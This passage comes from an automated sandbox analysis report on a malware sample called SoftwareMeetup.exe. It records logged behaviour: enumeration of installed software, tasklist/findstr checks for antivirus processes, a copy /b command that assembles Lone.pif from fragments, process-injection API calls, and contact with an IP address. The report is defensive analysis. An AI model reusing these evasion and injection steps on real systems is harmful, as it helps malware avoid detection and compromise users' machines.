RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	tasklist
cmdline	cmd /c mkdir 18919
cmdline	ping -n 5 localhost

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 783707d92eacdb7b05f14f64de37c1d9fc3b96f3
buffer	Buffer with sha1: ed035fa2e4347f68f7134ade8150af17561794e5

Communicates with host for which no DNS query was performed (1 event)

host

5.42.64.45

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 11, 2023, 7:17 p.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 90112 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0x00000214	1	0	0

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2224 manipulating memory of non-child process 604
NtAllocateVirtualMemory Dec. 11, 2023, 7:17 p.m.	process_identifier: 604 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x00400000 allocation_type: 4097 (MEM_COMMIT) process_handle: 0x00000214	1	0	0
NtProtectVirtualMemory Dec. 11, 2023, 7:17 p.m.	process_identifier: 604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 90112 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0x00000214	1	0	0

Collects information about installed applications (43 events)

Time & API	Arguments	Status
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 19.00 (x64) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HashTab 6.0.0.34 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HashTab\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Firefox (x64 en-US) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Maintenance Service regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 7 Update 51 (64-bit) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86417051FF}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 KOR Language Pack regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Office 64-bit Components 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0000-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared 64-bit MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0409-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared 64-bit MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0412-1000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft .NET Framework 4.5 한국어 언어 팩 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Python 2.7.18 (64-bit) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:48 p.m.	key_handle: 0x00002dcc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2224 called NtSetContextThread to modify thread in remote process 604
NtSetContextThread Dec. 11, 2023, 7:17 p.m.	registers.eip: 1995571652 registers.esp: 7798708 registers.edi: 0 registers.eax: 4233948 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000210 process_identifier: 604	1	0	0

Expresses interest in specific running processes (3 events)

process	lone.pif
process	cmd.exe
process: potential process injection target	explorer.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2844 resumed a thread in remote process 2224
Process injection	Process 2224 resumed a thread in remote process 604
NtResumeThread Dec. 11, 2023, 7:16 p.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 2224	1	0	0
NtResumeThread Dec. 11, 2023, 7:17 p.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 604	1	0	0

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2788 thread_handle: 0x0000010c process_identifier: 2784 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: track: 1 command_line: cmd /k cmd < Lay & exit filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000110	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2848 thread_handle: 0x00000088 process_identifier: 2844 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: cmd filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2892 thread_handle: 0x00000094 process_identifier: 2888 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\tasklist.exe track: 1 command_line: tasklist filepath_r: C:\Windows\system32\tasklist.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000009c	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2928 thread_handle: 0x00000094 process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\findstr.exe track: 1 command_line: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" filepath_r: C:\Windows\system32\findstr.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000a4	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 3060 thread_handle: 0x0000009c process_identifier: 3056 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\tasklist.exe track: 1 command_line: tasklist filepath_r: C:\Windows\system32\tasklist.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2056 thread_handle: 0x0000009c process_identifier: 812 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\findstr.exe track: 1 command_line: findstr /I "wrsa.exe" filepath_r: C:\Windows\system32\findstr.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000a8	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2116 thread_handle: 0x000000a8 process_identifier: 2112 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: cmd /c mkdir 18919 filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 152 thread_handle: 0x00000090 process_identifier: 192 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: cmd /c copy /b Layer + Twenty + Celebrity + Transcription + Facing + Ultimately 18919\Lone.pif filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000a8	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2212 thread_handle: 0x000000a8 process_identifier: 2192 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: cmd /c copy /b Cal + Ict 18919\X filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2220 thread_handle: 0x00000090 process_identifier: 2224 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif track: 1 command_line: 18919\Lone.pif 18919\X filepath_r: C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000a8	1	1
NtResumeThread Dec. 11, 2023, 7:16 p.m.	thread_handle: 0x00000090 suspend_count: 0 process_identifier: 2224	1	0
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2420 thread_handle: 0x000000a8 process_identifier: 2416 current_directory: C:\Users\test22\AppData\Local\Temp\35483 filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping -n 5 localhost filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Dec. 11, 2023, 7:17 p.m.	thread_identifier: 1120 thread_handle: 0x00000210 process_identifier: 604 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif filepath_r: stack_pivoted: 0 creation_flags: 134742020 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000214	1	1
NtGetContextThread Dec. 11, 2023, 7:17 p.m.	thread_handle: 0x00000210	1	0
NtAllocateVirtualMemory Dec. 11, 2023, 7:17 p.m.	process_identifier: 604 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x00400000 allocation_type: 4097 (MEM_COMMIT) process_handle: 0x00000214	1	0
NtSetContextThread Dec. 11, 2023, 7:17 p.m.	registers.eip: 1995571652 registers.esp: 7798708 registers.edi: 0 registers.eax: 4233948 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000210 process_identifier: 604	1	0
NtResumeThread Dec. 11, 2023, 7:17 p.m.	thread_handle: 0x00000210 suspend_count: 1 process_identifier: 604	1	0

SoftwareMeetup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All